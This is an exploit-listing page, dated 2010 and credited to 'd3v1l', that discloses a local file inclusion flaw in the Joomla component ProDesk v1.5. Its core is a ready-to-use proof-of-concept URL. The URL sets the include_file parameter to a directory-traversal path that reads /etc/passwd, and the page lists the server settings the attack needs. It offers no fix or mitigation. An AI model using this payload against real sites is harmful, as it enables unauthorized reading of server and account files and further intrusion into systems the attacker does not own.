Joomla Component ProDesk v1.5 LFI

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component ProDesk v1.5 LFI
# Published : 2010-11-08
# Author : d3v1l
# Previous Title : phpCow v2.1 File Inclusion Vulnerability
# Next Title : RSform! 1.0.5 (Joomla) Multiple Vulnerabilities

[~]-------------------------------------------------------------------------------------------------------
[~] Joomla Component ProDesk v 1.5 (com_pro_desk&include_file) Local File Inclusion  
[~]
[~] http://joomlashowroom.com
[~]  
[~] Price - $ 49.99
[~] ----------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 7.11.2010
[~]
[~] http://security-sh3ll.blogspot.com | http://twitter.com/securityshell
[~]
[~] -----------------------------------------------------------------------------------------------------
[~] Poc :-
[~]
[~] http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
[~]  
[~] Note :-
[~]
[~] Need: magic_quotes=OFF - Need: disable_functions=ini_set
[~]-------------------------------------------------------------------------------------------------------